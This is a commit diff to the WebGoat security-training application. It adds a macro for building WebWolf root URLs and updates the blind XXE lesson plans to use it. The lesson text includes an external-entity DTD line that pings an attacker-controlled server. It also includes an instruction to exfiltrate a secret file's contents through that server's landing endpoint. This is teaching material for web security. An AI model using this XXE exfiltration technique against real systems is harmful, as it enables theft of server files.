Fix for #545

Introduced new macro to make a clear distinction between /WebWolf with
context root and without.

webgoat-container/src/main/java/org/owasp/webgoat/AsciiDoctorTemplateResolver.java

@@ -37,6 +37,7 @@ import org.asciidoctor.Asciidoctor;
 import org.asciidoctor.extension.JavaExtensionRegistry;
 import org.owasp.webgoat.asciidoc.WebGoatVersionMacro;
 import org.owasp.webgoat.asciidoc.WebWolfMacro;
+import org.owasp.webgoat.asciidoc.WebWolfRootMacro;
 import org.owasp.webgoat.i18n.Language;
 import org.thymeleaf.TemplateProcessingParameters;
 import org.thymeleaf.resourceresolver.IResourceResolver;
@@ -87,6 +88,7 @@ public class AsciiDoctorTemplateResolver extends TemplateResolver {
                     StringWriter writer = new StringWriter();
                     JavaExtensionRegistry extensionRegistry = asciidoctor.javaExtensionRegistry();
                     extensionRegistry.inlineMacro("webWolfLink", WebWolfMacro.class);
+                    extensionRegistry.inlineMacro("webWolfRootLink", WebWolfRootMacro.class);
                     extensionRegistry.inlineMacro("webGoatVersion", WebGoatVersionMacro.class);
 
                     asciidoctor.convert(new InputStreamReader(is), writer, createAttributes());

webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java

@@ -45,6 +45,10 @@ public class WebWolfMacro extends InlineMacroProcessor {
         HttpServletRequest request = ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest();
         String ip = request.getRemoteAddr();
         String hostname = StringUtils.hasText(ip) ? ip : host;
-        return "http://" + hostname + ":" + port + "/WebWolf";
+        return "http://" + hostname + ":" + port + (includeWebWolfContext() ? "/WebWolf" : "");
+    }
+
+    protected boolean includeWebWolfContext() {
+        return true;
     }
 }

webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfRootMacro.java

@@ -0,0 +1,20 @@
+package org.owasp.webgoat.asciidoc;
+
+import java.util.Map;
+
+/**
+ * Usage in asciidoc:
+ * <p>
+ * webWolfLink:here[] will display a href with here as text
+ * webWolfLink:landing[noLink] will display the complete url, for example: http://WW_HOST:WW_PORT/landing
+ */
+public class WebWolfRootMacro extends WebWolfMacro {
+
+    public WebWolfRootMacro(String macroName, Map<String, Object> config) {
+        super(macroName, config);
+    }
+
+    protected boolean includeWebWolfContext() {
+        return false;
+    }
+}

webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc

@@ -5,7 +5,7 @@ Or the resource you are trying to read contains illegal XML character which caus
 Let's start with an example, in this case we reference an external DTD which we control on our own server.
 
 As an attacker you have WebWolf under your control (*this can be any server under your control.*), you can for example
-use this server to ping it using `webWolfLink:landing[noLink]`
+use this server to ping it using `webWolfRootLink:landing[noLink]`
 
 How do we use this endpoint to verify whether we can perform XXE?
 
@@ -14,7 +14,7 @@ We can again use WebWolf to host a file called `attack.dtd`, create this file wi
 [source, subs="macros, specialcharacters"]
 ----
 <?xml version="1.0" encoding="UTF-8"?>
-<!ENTITY ping SYSTEM 'webWolfLink:landing[noLink]'>
+<!ENTITY ping SYSTEM 'webWolfRootLink:landing[noLink]'>
 ----
 
 Now submit the form change the xml using to:
@@ -37,7 +37,7 @@ Now in WebWolf browse to 'Incoming requests' and you will see:
 ----
 {
   "method" : "GET",
-  "path" : "/ping",
+  "path" : "/landing",
   "headers" : {
     "request" : {
       "user-agent" : "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",

webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc

@@ -18,6 +18,6 @@ DTD.
 |`/home/webgoat/.webgoat-webGoatVersion:version[]/XXE/secret.txt`
 |===
 
-Try to upload this file using WebWolf landing page for example: `webWolfLink:landing?text=contents_file[noLink]`
+Try to upload this file using WebWolf landing page for example: `webWolfRootLink:landing?text=contents_file[noLink]`
 (NOTE: this endpoint is under your full control)
 Once you obtained the contents of the file post it as a new comment on the page and you will solve the lesson.